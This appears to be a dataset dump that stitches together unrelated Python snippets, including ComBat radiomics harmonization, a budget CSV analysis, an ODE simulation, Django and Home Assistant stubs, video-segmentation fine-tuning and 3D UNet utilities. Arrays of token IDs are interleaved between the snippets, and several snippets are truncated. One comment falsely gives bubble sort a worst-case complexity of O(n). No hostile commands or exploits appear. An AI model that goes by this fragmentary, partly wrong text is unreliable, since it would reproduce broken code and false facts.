per_feature=config['ComBat']['per_feature']) else: raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.") # Convert values back if logarithm was used if logarithmic: data_harmonized = 10 ** data_harmonized # Convert again to train hdf5 files feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))] for fnum, i_feat in enumerate(feature_values_train_combat): # Combine ComBat and non-ComBat features feature_values_temp = i_feat.tolist() + image_features_train_noncombat[fnum] # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 pid = label_data_train['patient_IDs'][fnum] panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=name ) print(f'Saving image features to: {features_train_out[fnum]}.') panda_data.to_hdf(features_train_out[fnum], 'image_features') # Repeat for testing if required if features_test_in: print(len(image_features_test_combat)) print(data_harmonized.shape[1]) feature_values_test_combat = [data_harmonized[:, i] for i in range(data_harmonized.shape[1] - len(image_features_test_combat), data_harmonized.shape[1])] for fnum, i_feat in enumerate(feature_values_test_combat): print(fnum) # Combine ComBat and non-ComBat features feature_values_temp = i_feat.tolist() + image_features_test_noncombat[fnum] # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 pid = label_data_test['patient_IDs'][fnum] panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=name ) print(f'Saving image features to: {features_test_out[fnum]}.') panda_data.to_hdf(features_test_out[fnum], 'image_features') def ComBatPython(dat, batch, mod=None, par=1, eb=1, per_feature=False, 
plotting=False): """ Run the ComBat Function python script. par = 0 is non-parametric. """ # convert inputs to neuroCombat format. covars = dict() categorical_cols = list() covars['batch'] = batch if mod is not None: for i_mod in range(mod.shape[1]): label = f'mod_{i_mod}' covars[label] = [m for m in mod[:, i_mod]] categorical_cols.append(label) covars = pd.DataFrame(covars) batch_col = 'batch' if par == 0: parametric = False elif par == 1: parametric = True else: raise WORCValueError(f'Par should be 0 or 1, now {par}.') if eb == 0: eb = False elif eb == 1: eb = True else: raise WORCValueError(f'eb should be 0 or 1, now {eb}.') if per_feature == 0: per_feature = False elif per_feature == 1: per_feature = True else: raise WORCValueError(f'per_feature should be 0 or 1, now {per_feature}.') # execute ComBat if not per_feature: data_harmonized = neuroCombat(dat=dat, covars=covars, batch_col=batch_col, categorical_cols=categorical_cols, eb=eb, parametric=parametric) elif per_feature: print('\t Executing ComBat per feature.') data_harmonized = np.zeros(dat.shape) # Shape: (features, samples) for i in range(dat.shape[0]): if eb: # Copy feature + random noise random_feature = np.random.rand(dat[i, :].shape[0]) feat_temp = np.asarray([dat[i, :], dat[i, :] + random_feature]) else: # Just use the single feature feat_temp = np.asarray([dat[i, :]]) feat_temp = neuroCombat(dat=feat_temp, covars=covars, batch_col=batch_col, categorical_cols=categorical_cols, eb=eb, parametric=parametric) data_harmonized[i, :] = feat_temp[0, :] if plotting: feat1 = dat[i, :] feat1_harm = data_harmonized[i, :] print(len(feat1)) feat1_b1 = [f for f, b in zip(feat1, batch[0]) if b == 1.0] feat1_b2 = [f for f, b in zip(feat1, batch[0]) if b == 2.0] print(len(feat1_b1)) print(len(feat1_b2)) feat1_harm_b1 = [f for f, b in zip(feat1_harm, batch[0]) if b == 1.0] feat1_harm_b2 = [f for f, b in zip(feat1_harm, batch[0]) if b == 2.0] plt.figure() ax = plt.subplot(2, 1, 1) ax.scatter(np.ones((len(feat1_b1))), 
feat1_b1, color='red') ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_b2, color='blue') plt.title('Before Combat') ax = plt.subplot(2, 1, 2) ax.scatter(np.ones((len(feat1_b1))), feat1_harm_b1, color='red') ax.scatter(np.ones((len(feat1_b2))) + 1, feat1_harm_b2, color='blue') plt.title('After Combat') plt.show() else: raise WORCValueError(f'per_feature should be False or True, now {per_feature}.') return data_harmonized def Synthetictest(n_patients=50, n_features=10, par=1, eb=1, per_feature=False, difscale=False, logarithmic=False, oddpatient=True, oddfeat=True, samefeat=True): """Test for ComBat with Synthetic data.""" features = np.zeros((n_features, n_patients)) batch = list() # First batch: Gaussian with loc 0, scale 1 for i in range(0, int(n_patients/2)): feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features)] if i == 1 and oddpatient: feat_temp = [np.random.normal(loc=10.0, scale=1.0) for i in range(n_features)] elif oddfeat: feat_temp = [np.random.normal(loc=0.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)] if samefeat: feat_temp[-1] = 1 features[:, i] = feat_temp batch.append(1) # Get directions for features directions = list() for i in range(n_features): direction = random.random() if direction > 0.5: directions.append(1.0) else: directions.append(-1.0) # First batch: Gaussian with loc 5, scale 1 for i in range(int(n_patients/2), n_patients): feat_temp = [np.random.normal(loc=direction*5.0, scale=1.0) for i in range(n_features)] if oddfeat: feat_temp = [np.random.normal(loc=5.0, scale=1.0) for i in range(n_features - 1)] + [np.random.normal(loc=10000.0, scale=1.0)] if difscale: feat_temp = [f + 1000 for f in feat_temp] feat_temp = np.multiply(feat_temp, directions) if samefeat: feat_temp[-1] = 1 features[:, i] = feat_temp batch.append(2) # Create mod var mod = [[np.random.randint(30, 100) for i in range(n_patients)]] # Apply ComBat batch = np.asarray([batch]) mod = 
np.transpose(np.asarray(mod)) if logarithmic: minfeat = np.min(features) features = np.log10(features + np.abs(minfeat) + 1E-100) data_harmonized = ComBatPython(dat=features, batch=batch, mod=mod, par=par, eb=eb, per_feature=per_feature) if logarithmic: data_harmonized = 10 ** data_harmonized - np.abs(minfeat) for i in range(n_features): f = plt.figure() ax = plt.subplot(2, 1, 1) ax.scatter(np.ones((int(n_patients/2))), features[i, 0:int(n_patients/2)], color='red') ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, features[i, int(n_patients/2):], color='blue') plt.title('Before Combat') ax = plt.subplot(2, 1, 2) ax.scatter(np.ones((int(n_patients/2))), data_harmonized[i, 0:int(n_patients/2)], color='red') ax.scatter(np.ones((n_patients - int(n_patients/2))) + 1, data_harmonized[i, int(n_patients/2):], color='blue') plt.title('After Combat') plt.show() f.savefig(f'combat_par{par}_eb{eb}_perfeat{per_feature}_feat{i}.png') # Logarithmic: not useful, as we have negative numbers, and (almost) zeros. # so combat gives unuseful results. # Same feature twice with eb and par: nans def ComBatMatlab(dat, batch, command, mod=None, par=1, per_feature='true'): """ Run the ComBat Function Matlab script. par = 0 is non-parametric. 
""" # Mod: default argument is empty list if mod is None: mod = [] # TODO: Add check whether matlab executable is found # Save the features in a .mat MatLab Compatible format # NOTE: Should change this_folder to a proper temporary directory this_folder = os.path.dirname(os.path.realpath(__file__)) tempdir = tempfile.gettempdir() tempfile_in = os.path.join(tempdir, 'combat_input.mat') tempfile_out = os.path.join(tempdir, 'combat_output.mat') ComBatFolder = os.path.join(os.path.dirname(this_folder), 'external', 'ComBatHarmonization', 'Matlab', 'scripts') dict = {'output': tempfile_out, 'ComBatFolder': ComBatFolder, 'datvar': dat, 'batchvar': batch, 'modvar': mod, 'parvar': par, 'per_feature': per_feature } sio.savemat(tempfile_in, dict) # Make sure there is no tempfile out from the previous run if os.path.exists(tempfile_out): os.remove(tempfile_out) # Run ComBat currentdir = os.getcwd() if platform == "linux" or platform == "linux2": commandseparator = ' ; ' elif platform == "win32": commandseparator = ' & ' # BIGR Cluster: /cm/shared/apps/matlab/R2015b/bin/matlab regcommand = ('cd "' + this_folder + '"' + commandseparator + '"' + command + '" -nodesktop -nosplash -nojvm -r "combatmatlab(' + "'" + str(tempfile_in) + "'" + ')"' + commandseparator + 'cd "' + currentdir + '"') print(f'Executing ComBat in Matlab through command: {regcommand}.') proc = subprocess.Popen(regcommand, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) proc.wait() stdout_value, stderr_value = proc.communicate() # BUG: Waiting does not work, just wait for output to arrive, either with # the actual output or an error message succes = False while succes is False: if os.path.exists(tempfile_out): try: mat_dict = sio.loadmat(tempfile_out) try: data_harmonized = mat_dict['data_harmonized'] succes = True except KeyError: try: message = mat_dict['message'] raise WORCValueError(f'Error in Matlab ComBat execution: {message}.') except KeyError: pass except 
(sio.matlab.miobase.MatReadError, ValueError): pass # Check if expected output file exists if not os.path.exists(tempfile_out): raise WORCValueError(f'Error in Matlab ComBat execution: command: {regcommand}, stdout: {stdout_value}, stderr: {stderr_value}') # Read the output from ComBat mat_dict = sio.loadmat(tempfile_out) data_harmonized = mat_dict['data_harmonized'] data_harmonized = np.transpose(data_harmonized) # Remove temporary files os.remove(tempfile_out) os.remove(tempfile_in) return data_harmonized
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 12131, 8436, 35914, 48656, 4912, 18481, 353, 11043, 11, 2129, 32514, 286, 198, 2, 8366, 554, 18982, 873, 290, 5325, 12371, 11, 5256, 8597, 385, 13122, 11, 18481, 353, 11...
2.149943
11,411
import os import sys from setuptools import setup, find_packages ROOT = os.path.realpath(os.path.join(os.path.dirname( sys.modules['__main__'].__file__))) sys.path.insert(0, os.path.join(ROOT, 'src')) setup( name='pgworker', packages=find_packages('src'), package_dir={'': 'src'}, classifiers=[ 'Intended Audience :: Developers', 'Intended Audience :: System Administrators', 'Operating System :: POSIX :: Linux', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', ], entry_points={ 'console_scripts': [ 'pgworker = pgworker.runner:main' ] } )
[ 11748, 28686, 198, 11748, 25064, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 11, 1064, 62, 43789, 198, 198, 13252, 2394, 796, 28686, 13, 6978, 13, 5305, 6978, 7, 418, 13, 6978, 13, 22179, 7, 418, 13, 6978, 13, 15908, 3672, 7, 198...
2.407285
302
import os import csv path = '/Users/kevinkosumi12345/Genti/python-challenge/PyBank/Resources/budget_data.csv' budget_csv=os.path.join("../Resources", "budget_data.csv") csvfile = open(path, newline="") reader=csv.reader(csvfile, delimiter=",") header = next(reader) # print(header) # the columns we have to convert into lists # Create first 2 empty lists according 2 columns date = [] profloss = [] # print("Financial Anaysis") # print("-----------------------------------------") for row in reader: date.append(row[0]) profloss.append(int(row[1])) # getting the total of Profit/Losses total_profloss='Total Profit/Losses: $ ' + str(sum(profloss)) # print(total_profloss) # getting the number of months in entire period monthcount = 'Total months: ' + str(len(date)) # print(monthcount) # before finding the averadge of change in Profit/Losses, first we have to find the total change Total_change_profloss = 0 for x in range(1, len(profloss)): Total_change_profloss = Total_change_profloss + (profloss[x] - profloss[x-1]) # finding the averidge of change in Profit/Losses avg_change_profloss = 'Averidge change in Profit/Loss: ' + str(round(Total_change_profloss/(len(profloss)-1),2)) # print(avg_change_profloss) # getting the max value of data in Profit/Losses which is the Greatest Increase of Profit/Losses maxVal = 'Greatest increase of Profit/Losses: ' + ' on ' + str(date[profloss.index(max(profloss))]) + ' $ ' + str(max(profloss)) # print(maxVal) # the min Value of date in Profit/Losses which is the Greatest Decrease minVal = 'Greatest decrease of Profit/Losses: ' + ' on ' + str(date[profloss.index(min(profloss))]) + ' $ ' + str(min(profloss)) # print(minVal) DataBudget = open('analisis.csv' , 'w') DataBudget.write('Financial Analysus\n') DataBudget.write('------------------------\n') DataBudget.write(monthcount + '\n') DataBudget.write(total_profloss + '\n') DataBudget.write(avg_change_profloss + '\n') DataBudget.write(maxVal + '\n') DataBudget.write(minVal + '\n') 
DataBudget.close
[ 11748, 28686, 198, 11748, 269, 21370, 628, 198, 198, 6978, 796, 31051, 14490, 14, 365, 85, 676, 418, 12994, 10163, 2231, 14, 38, 298, 72, 14, 29412, 12, 36747, 3540, 14, 20519, 28650, 14, 33236, 14, 37315, 62, 7890, 13, 40664, 6, 19...
2.813793
725
import numpy as np import matplotlib.pyplot as plt T = 30000 # v = 0.02906 # v = 0.617085 v = 0.99 h = 0.01 a = 0.5 b = 0.5 epsilon = 0.05 c = 0.4 eta = lambda rho: np.exp(-(rho)**2/(2*c**2)) nrho = lambda rho, v: -2.0*(rho**3 + (rho-1.0)*v/2.0 - rho)/(rho + 1.0) nu = lambda rho: (b - eta(rho+1))/a u = np.zeros(T) rho = np.zeros(T) time = np.zeros(T) # Maps f = lambda rho, u, v: -rho**3 - (rho + 1.0)*u/2.0 - (rho - 1.0)*v/2.0 + rho g1 = lambda rho, u, v: epsilon*(b - a*u - eta(rho+1)) # Initial conditions u[0] = 0.0 rho[0] = -0.0 for i in range(T-1): rho[i+1] = rho[i] + h*f(rho[i], u[i], v) u[i+1] = u[i] + h*g1(rho[i], u[i], v) time[i+1] = time[i] + h fig, ax = plt.subplots(1, 2) # X, Y = np.meshgrid(np.arange(-0.6, 0.6, 0.1), np.arange(-0.2, 1.0, .1)) # U = f(X, Y, v)/epsilon #rho # V = g1(X, Y, v)/epsilon #u # q = ax[0].quiver(X, Y, U, V, units='x', pivot='tip')#, width=0.022, scale=1 / 0.40) rhos = np.linspace(-0.99, 1, 100) ax[0].plot( rhos, nrho(rhos, v), color = [0.8, 0.5, 0.5], linewidth = 3.0) ax[0].plot( rhos, nu(rhos), color = [0.5, 0.5, 0.8], linewidth = 3.0) ax[0].plot( rho[0], u[0], 'k.', linewidth = 3.0) ax[0].plot( rho, u, 'k' ) ax[0].plot( [-1, -1], [-1.5, 1.5], 'k--') ax[0].set_ylabel('u') ax[0].set_xlabel(r'$\rho$') ax[0].text(0.5, nu(0.5)+0.05, r'$u_0$') ax[0].text(0.95, nrho(0.9, v), r'$\rho_0$') ax[0].axis([-2, 2, -1.0, 1.5]) ax[1].plot( time, u, label = 'u') ax[1].plot( time, rho, label = r'$\rho$' ) ax[1].legend() ax[1].set_xlabel('time') plt.show()
[ 11748, 299, 32152, 355, 45941, 220, 220, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 220, 198, 198, 51, 796, 513, 2388, 198, 2, 410, 796, 657, 13, 48891, 3312, 198, 2, 410, 796, 657, 13, 47941, 2919, 20, 198, 85,...
1.712994
885
import numpy as np import os my_array = np.zeros(10) print(my_array) os.system('pip freeze > requirements.txt') my_list = [1,2,3,4,5] for item in my_list: print(item)
[ 11748, 299, 32152, 355, 45941, 198, 11748, 28686, 628, 198, 1820, 62, 18747, 796, 45941, 13, 9107, 418, 7, 940, 8, 198, 4798, 7, 1820, 62, 18747, 8, 198, 198, 418, 13, 10057, 10786, 79, 541, 16611, 1875, 5359, 13, 14116, 11537, 198,...
2.285714
77
#! /usr/bin/python3 import argparse import os import re import sqlite3 as sql import sys import xml.etree.cElementTree as et import traceback import lib.initialize as initialize import lib.sqlite_interface as misc import lib.meta as meta # ================== # EXPORTED FUNCTIONS # ==================
[ 2, 0, 1220, 14629, 14, 8800, 14, 29412, 18, 198, 198, 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 302, 198, 11748, 44161, 578, 18, 355, 44161, 198, 11748, 25064, 198, 11748, 35555, 13, 316, 631, 13, 66, 20180, 27660, 355, 2123,...
3.4
90
from matplotlib.pyplot import get import pyhips from pyhips import get_image def test_get_image(): """ Tests the get_image() function to make sure no errors are thrown. """ assert get_image("Vega", frame="ICRS", survey="DSS", cmap="plasma") == 0 assert get_image("notanid", frame="ICRS", survey="DSS", cmap="plasma") == 1 assert get_image("Vega", frame="notaframe", survey="DSS", cmap="plasma") == 1 assert get_image("Vega", frame="ICRS", survey="notasurvey", cmap="plasma") == 1 assert get_image("Vega", frame="ICRS", survey="DSS", cmap="notacolormap") == 1 if __name__ == "__main__": test_get_image()
[ 6738, 2603, 29487, 8019, 13, 9078, 29487, 1330, 651, 198, 11748, 12972, 5748, 198, 6738, 12972, 5748, 1330, 651, 62, 9060, 628, 198, 4299, 1332, 62, 1136, 62, 9060, 33529, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 30307, 262, 651...
2.669421
242
""" Template module for cumulus. template class for reading yaml tempalte and creating data_source objects to retrieve external data. """
[ 37811, 198, 30800, 8265, 329, 10973, 23515, 13, 198, 28243, 1398, 329, 3555, 331, 43695, 2169, 18596, 660, 290, 4441, 1366, 62, 10459, 5563, 284, 198, 1186, 30227, 7097, 1366, 13, 198, 37811, 198 ]
4.058824
34
# Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst case complexity of O(n).
[ 2, 220, 33691, 3297, 4831, 832, 262, 1351, 290, 23008, 15909, 14729, 286, 4847, 13, 383, 4847, 389, 37245, 611, 484, 389, 287, 262, 2642, 1502, 13, 383, 1208, 832, 262, 5576, 9741, 6903, 286, 262, 1351, 318, 5100, 1566, 262, 1351, 3...
4.802817
71
if __name__ == '__main__': minion_game(input("Enter a string: "))
[ 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 28365, 62, 6057, 7, 15414, 7203, 17469, 257, 4731, 25, 366, 4008, 198 ]
2.535714
28
# -*- coding: utf-8 -*- import numpy as np X = np.random.rand(2) #input W = np.random.rand(2,3) #weight B = np.random.rand(3) #bias print(X) print(W) print(B) Y=np.dot(X,W)+B print(Y)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 299, 32152, 355, 45941, 628, 198, 55, 796, 45941, 13, 25120, 13, 25192, 7, 17, 8, 1303, 15414, 198, 54, 796, 45941, 13, 25120, 13, 25192, 7, 17, 11, 18, 8, ...
1.928571
98
from pytest_bdd import given, when, then from model.contact import Contact import random
[ 6738, 12972, 9288, 62, 65, 1860, 1330, 1813, 11, 618, 11, 788, 198, 6738, 2746, 13, 32057, 1330, 14039, 198, 11748, 4738 ]
4
22
#!/usr/bin/env python """ Figures generated by HiST program intended for use with in/ files including: *_flame.ini *_impulse.ini *_trans.ini Flaming Aurora 2 cameras: ./FigureMaker.py in/2cam_flame.ini Translating Aurora 2 cameras: ./FigureMaker.py in/2cam_trans.ini Impulse Aurora (for testing): ./FigureMaker.py in/2cam_impulse.ini Table of results for 2 and 3 cam: ./FigureMaker.py in/table_flame{2,3}.ini REAL actual camera data (just dump synchroinzed frames: ./FigureMaker.py -m realvid in/apr14T085454 -m optim reconstruct only """ from histfeas import userinput, hist_figure from histfeas.loadAnalyze import readresults, findxlsh5 P = userinput() #%% compute if not P["load"]: hist_figure(P) #%% load flist, P = findxlsh5(P) readresults(flist, P)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 37811, 198, 14989, 942, 7560, 416, 15902, 2257, 1430, 198, 198, 600, 1631, 329, 779, 351, 287, 14, 3696, 1390, 25, 198, 9, 62, 49621, 13, 5362, 198, 9, 62, 11011, 9615, 13, 5362, 1...
2.736655
281
from django.db import models # Create your models here. from django.contrib.auth.models import ( AbstractBaseUser, BaseUserManager, PermissionsMixin, ) from django.core.validators import RegexValidator from django.db import models
[ 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 198, 2, 13610, 534, 4981, 994, 13, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 357, 198, 220, 220, 220, 27741, 14881, 12982, 11, 198, 220, 220, 220, 7308, 12982, ...
3.1
80
"""Component to control v6m relays and sensors. For more details about this component, please refer to the documentation at https://home-assistant.io/components/v6m/ """ import logging import voluptuous as vol from homeassistant.const import ( EVENT_HOMEASSISTANT_STOP, CONF_HOST, CONF_PORT, CONF_NAME) import homeassistant.helpers.config_validation as cv REQUIREMENTS = ['pyv6m==0.0.1'] _LOGGER = logging.getLogger(__name__) DOMAIN = 'v6m' CONFIG_SCHEMA = vol.Schema({ DOMAIN: vol.Schema({ vol.Required(CONF_HOST): cv.string, vol.Required(CONF_PORT): cv.port, vol.Optional(CONF_NAME, default=DOMAIN): cv.string, }), }, extra=vol.ALLOW_EXTRA) def setup(hass, base_config): """Start V6M controller.""" from pyv6m.pyv6m import V6M config = base_config.get(DOMAIN) host = config[CONF_HOST] port = config[CONF_PORT] controller = V6MController(host, port) hass.data[config[CONF_NAME]] = controller hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, cleanup) return True
[ 37811, 21950, 284, 1630, 410, 21, 76, 823, 592, 290, 15736, 13, 198, 198, 1890, 517, 3307, 546, 428, 7515, 11, 3387, 3522, 284, 262, 10314, 379, 198, 5450, 1378, 11195, 12, 562, 10167, 13, 952, 14, 5589, 3906, 14, 85, 21, 76, 14, ...
2.473934
422
import uuid from django.db import models from django.db.models.fields import TextField
[ 11748, 334, 27112, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 198, 6738, 42625, 14208, 13, 9945, 13, 27530, 13, 25747, 1330, 8255, 15878, 628, 220, 220, 220, 220, 198 ]
3.032258
31
""" References: https://github.com/scaelles/OSVOS-TensorFlow """ from __future__ import print_function import os import random import tensorflow as tf import time import numpy as np from utils import models from utils.load_data_finetune import Dataset from utils.logger import create_logger # seed seed = random.randint(1, 100000) # seed = 0 tf.random.set_seed(seed) random.seed(seed) np.random.seed(seed) # User defined path parameters # finetuning (one label) and testing dataset sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p' sequence_names = os.listdir(sequence_images_path) # Get the best frame selection from BubblNet bub_frame_path = './datasets/bubbleNet_data/rawData' def create_non_exist_file(non_exist_file): """Create the file when it does not exist""" if not os.path.exists(non_exist_file): os.mkdir(non_exist_file) def select_optimal_frame(seq_name): """Use the optimal frame from BubbleNet selection for fine-tuning""" # # Select from BN0 or BNLF # frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt') # # Select from BN0 # frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt') # Select from BNLF frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt') frame_file = open(frame_txt, 'r') frame_nums = frame_file.readlines() # The following code is used to extract the name of frame selection # refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information if len(frame_nums) == 3: frame_random_jpg = frame_nums[2][:9] frame_random_png = frame_nums[2][:5] + '.png' # when two bubblenet models select the different frames, the txt file will have 5 lines elif len(frame_nums) == 5: frame_suggestion1_jpg = frame_nums[2][:9] frame_suggestion1_png = frame_nums[2][:5] + '.png' frame_suggestion2_jpg = frame_nums[4][:9] frame_suggestion2_png = frame_nums[4][:5] + '.png' frame_random_lst = random.choice( [[frame_suggestion1_jpg, frame_suggestion1_png], 
[frame_suggestion2_jpg, frame_suggestion2_png]]) frame_random_jpg = frame_random_lst[0][:9] frame_random_png = frame_random_lst[1][:9] else: raise ValueError("frame file from BubbleNet is not correct") return frame_random_jpg, frame_random_png if __name__ == '__main__': train_test(sequence_names)
[ 37811, 198, 19927, 25, 3740, 1378, 12567, 13, 785, 14, 1416, 64, 695, 274, 14, 2640, 53, 2640, 12, 51, 22854, 37535, 198, 37811, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 28686, 198, 11748, 4738, 198, 11748, 1119...
2.558187
971
from dataclasses import field, dataclass from typing import List from kinopoisk_unofficial.contract.response import Response from kinopoisk_unofficial.model.season import Season
[ 6738, 4818, 330, 28958, 1330, 2214, 11, 4818, 330, 31172, 198, 6738, 19720, 1330, 7343, 198, 198, 6738, 18967, 404, 78, 1984, 62, 403, 16841, 13, 28484, 13, 26209, 1330, 18261, 198, 6738, 18967, 404, 78, 1984, 62, 403, 16841, 13, 1984...
3.829787
47
import subprocess import os import shutil import tempfile import random import string import yaml src_dir=os.path.dirname(os.path.realpath(__file__)) #def _write_text_file(fname,txt): # with open(fname,'w') as f: # f.write(txt)
[ 11748, 850, 14681, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 11748, 20218, 7753, 198, 11748, 4738, 198, 11748, 4731, 198, 11748, 331, 43695, 198, 198, 10677, 62, 15908, 28, 418, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 53...
2.5
96
#! /usr/bin/env python3 # coding=utf-8 # Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved. # Copyright 2021 The MLPerf Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import time from scipy import signal from global_vars import * __doc__ = """ Collection of utilities 3D UNet MLPerf-Inference reference model uses. gaussian_kernel(n, std): returns gaussian kernel; std is standard deviation and n is number of points apply_norm_map(image, norm_map): applies normal map norm_map to image and return the outcome apply_argmax(image): returns indices of the maximum values along the channel axis finalize(image, norm_map): finalizes results obtained from sliding window inference prepare_arrays(image, roi_shape): returns empty arrays required for sliding window inference upon roi_shape get_slice_for_sliding_window(image, roi_shape, overlap): returns indices for image stride, to fulfill sliding window inference timeit(function): custom-tailored decorator for runtime measurement of each inference """ def gaussian_kernel(n, std): """ Returns gaussian kernel; std is standard deviation and n is number of points """ gaussian1D = signal.gaussian(n, std) gaussian2D = np.outer(gaussian1D, gaussian1D) gaussian3D = np.outer(gaussian2D, gaussian1D) gaussian3D = gaussian3D.reshape(n, n, n) gaussian3D = np.cbrt(gaussian3D) gaussian3D /= gaussian3D.max() return gaussian3D def apply_norm_map(image, norm_map): """ Applies normal map norm_map to image 
and return the outcome """ image /= norm_map return image def apply_argmax(image): """ Returns indices of the maximum values along the channel axis Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result """ channel_axis = 1 image = np.argmax(image, axis=channel_axis).astype(np.uint8) image = np.expand_dims(image, axis=0) return image def finalize(image, norm_map): """ Finalizes results obtained from sliding window inference """ # NOTE: layout is assumed to be linear (NCDHW) always # apply norm_map image = apply_norm_map(image, norm_map) # argmax image = apply_argmax(image) return image def prepare_arrays(image, roi_shape=ROI_SHAPE): """ Returns empty arrays required for sliding window inference such as: - result array where sub-volume inference results are gathered - norm_map where normal map is constructed upon - norm_patch, a gaussian kernel that is applied to each sub-volume inference result """ assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\ f"Need proper ROI shape: {roi_shape}" image_shape = list(image.shape[2:]) result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype) norm_map = np.zeros_like(result) norm_patch = gaussian_kernel( roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype) return result, norm_map, norm_patch def runtime_measure(function): """ A decorator for runtime measurement Custom-tailored for measuring inference latency Also prints str: mystr that summarizes work in SUT """ return get_latency
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 28, 40477, 12, 23, 198, 2, 15069, 357, 66, 8, 33448, 15127, 23929, 44680, 6234, 13, 1439, 2489, 10395, 13, 198, 2, 15069, 33448, 383, 10373, 5990, 69, 46665, 13, 14...
3.017941
1,282
import binaryRepr # Create decorator function to see how many times functions are called # Calculate Partition (C_k, r(U)) - the partitions # of each candidate at level k are calculated # Takes in data frame of relation and a candidate in C_km1 # Outputs partition of Candidate in C_km1 in relation to data frame # Obtain FDs(C_km1) - checks the FDs of each # candidate X in C_k # - FDs of the form X -> v_i, where # v_i *Exists* U - X^{+} are checked by # comparing *Partition* X and *Partition* X v_i # # F = Null_Set # for each candidate X in C_km1 # for each v_i *exists* U - X^{+} \\Pruning rule 3 # if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then # { # X* = X *Union* {v_i} # F = F *Union* {X -> v_i} \\Theorem 2 # } # return (F); def f(C_km1, df, Closure, U, Cardinality): # Set F to null list; Initialize U_c to remaining columns in data frame F = []; U_c = list(df.head(0)); # Identify the subsets whose cardinality of partition should be tested SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])]; # Add singleton set to SubsetsToCheck if on first k-level if len(C_km1[0]) == 1: SubsetsToCheck += C_km1; # Iterate through subsets mapped to the Cardinality of Partition function for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))): # Add Cardinality of Partition to dictionary Cardinality[binaryRepr.toBin(Cand, U)] = Card; # Iterate through candidates of C_km1 for Candidate in C_km1: # Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])): # Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i} if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]: # Add 
attribute v_i to closure Closure[binaryRepr.toBin(Candidate, U)].add(v_i) # Add list (Candidate, v_i) to F F.append([tuple(Candidate), v_i]); return Closure, F, Cardinality;
[ 11748, 13934, 6207, 81, 198, 198, 2, 13610, 11705, 1352, 2163, 284, 766, 703, 867, 1661, 5499, 389, 1444, 198, 198, 2, 27131, 378, 2142, 653, 357, 34, 62, 74, 11, 374, 7, 52, 4008, 532, 262, 43869, 198, 2, 220, 220, 220, 220, 22...
2.317431
1,090
import os import numpy as np import pandas as pd import experiments.benchmarks.benchmark as benchmark ActivityBenchmark()
[ 11748, 28686, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 11748, 10256, 13, 26968, 14306, 13, 26968, 4102, 355, 18335, 628, 198, 198, 16516, 44199, 4102, 3419, 198 ]
3.527778
36
